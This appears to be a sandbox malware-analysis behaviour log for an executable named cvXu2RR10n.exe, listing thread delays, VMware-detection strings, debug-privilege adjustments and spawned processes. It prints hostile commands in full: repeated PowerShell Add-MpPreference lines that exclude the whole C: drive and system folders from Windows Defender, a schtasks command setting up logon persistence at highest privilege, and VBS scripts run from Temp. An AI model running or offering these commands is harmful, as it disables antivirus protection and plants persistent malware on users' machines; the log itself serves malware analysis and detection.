Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 599718
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477

Source: ApplicationFrameHost.exe, 00000032.00000002.1424510273.0000000001542000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'T:am
Source: cvXu2RR10n.exe, 00000000.00000002.1744856741.000000001C714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cvXu2RR10n.exe, 00000000.00000002.1694862103.000000001C2C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: cvXu2RR10n.exe, 00000000.00000002.1744856741.000000001C714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\2
Source: cvXu2RR10n.exe, 00000000.00000002.1744856741.000000001C714000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process token adjusted: Debug
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Recovery\smartscreen.exe	Process token adjusted: Debug
Source: C:\Recovery\smartscreen.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Process created: C:\Users\user\Music\ApplicationFrameHost.exe "C:\Users\user\Music\ApplicationFrameHost.exe"	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs"
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs"

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Queries volume information: C:\Users\user\Desktop\cvXu2RR10n.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Users\user\Music\ApplicationFrameHost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Queries volume information: C:\Users\user\Music\ApplicationFrameHost.exe VolumeInformation	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Queries volume information: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe VolumeInformation	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Queries volume information: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
